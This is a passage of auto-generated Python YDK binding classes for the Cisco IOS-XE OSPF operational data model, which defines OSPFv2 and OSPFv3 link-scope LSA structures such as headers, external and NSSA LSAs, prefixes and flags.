"link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): """ External LSA .. attribute:: mt_id (key) MT\-ID for topology enabled on the link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv2UnknownTlv(Entity): """ OSPFv2 Unknown TLV .. attribute:: type (key) TLV type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: length TLV length **type**\: int **range:** 0..65535 **config**\: False .. attribute:: value TLV value **type**\: list of int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__() self.yang_name = "ospfv2-unknown-tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['type'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('value', (YLeafList(YType.uint8, 'value'), ['int'])), ]) self.type = None self.length = None self.value = [] self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value) class Ospfv3LsaVal(Entity): """ OSPFv3 LSA .. attribute:: header Decoded OSPFv3 LSA header **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header>` **config**\: False .. attribute:: lsa_body Decoded OSPFv3 LSA body **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__() self.yang_name = "ospfv3-lsa-val" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value) class Header(Entity): """ Decoded OSPFv3 LSA header .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: lsa_header LSA header **type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader>` **config**\: False .. attribute:: lsa_hdr_options OSPFv3 LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): """ LSA header .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): """ Decoded OSPFv3 LSA body .. attribute:: network OSPFv3 network **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network>` **config**\: False .. attribute:: prefix OSPFv3 inter area prefix **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix>` **config**\: False .. attribute:: ia_router OSPFv3 inter area router **type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter>` **config**\: False .. attribute:: lsa_external OSPFv3 LSA external **type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal>` **config**\: False .. attribute:: nssa OSPFv3 NSSA **type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa>` **config**\: False .. attribute:: link_data OSPFv3 Link data **type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData>` **config**\: False .. attribute:: ia_prefix OSPFv3 Intra area prefixes **type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix>` **config**\: False .. attribute:: lsa_flag_options LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False .. attribute:: lsa_body_flags LSA Body Flags **type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): """ OSPFv3 network .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_net_options Network LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): """ OSPFv3 inter area prefix .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ia_prefix Inter area Prefix **type**\: str **config**\: False .. attribute:: ia_prefix_options Inter area prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): """ OSPFv3 inter area router .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: destination_router_id Router ID of the router being described by the LSA **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_ia_options Inter area LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): """ OSPFv3 LSA external .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): """ OSPFv3 NSSA .. attribute:: lsa_nssa_external NSSA LSA **type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): """ NSSA LSA .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], 